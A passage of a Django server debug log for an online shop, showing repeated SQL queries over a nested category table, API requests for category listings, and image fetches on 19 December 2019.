"shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:00:06,414 utils 4252 140031492613888 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:00:06,417 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:00:06,419 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:00:06,423 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-19 14:00:06,427 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:00:06,430 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:00:06,432 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:00:06,435 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) [19/Dec/2019 14:00:06] "GET /api/v1/categories/3 HTTP/1.0" 200 942 DEBUG 2019-12-19 14:00:06,438 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:00:06,440 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:00:06,444 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:00:06,447 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:00:06,450 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:00:06,453 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:00:06,455 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:00:06,459 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:00:06,462 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:00:06,465 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:00:06,467 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:00:06,469 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 14:00:06,472 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:00:06,475 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:00:06,478 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:00:06,481 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:00:06,483 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:00:06,487 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:00:06,493 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:00:06,500 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:00:06,508 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:00:06,512 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:00:06,518 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:00:06,524 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:00:06,528 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:00:06,533 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:00:06,537 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:00:06,541 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 14:00:06,545 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:00:06,550 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:00:06,554 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:00:06,559 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:00:06,564 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:00:06,567 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:00:06] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 14:00:07] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 14:00:07] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 14:00:07] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 14:00:09] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 14:00:12] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 14:00:14] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 14:00:15] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 14:00:17] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [19/Dec/2019 14:00:17] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 DEBUG 2019-12-19 14:01:51,655 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:01:51,664 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:01:51,668 utils 4252 140031492613888 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-19 14:01:51,674 utils 4252 140031747061504 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:01:51,678 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:01:51,682 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 14:01:51,688 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [19/Dec/2019 14:01:51] "GET /api/v1/categories/3 HTTP/1.0" 200 942 DEBUG 2019-12-19 14:01:51,691 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:01:51,694 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:01:51,697 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:01:51,701 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:01:51,706 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:01:51,710 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:01:51,713 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 14:01:51,718 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:01:51,721 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:01:51,726 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:01:51,731 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:01:51,734 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:01:51,736 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:01:51,739 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:01:51,742 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:01:51,745 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" 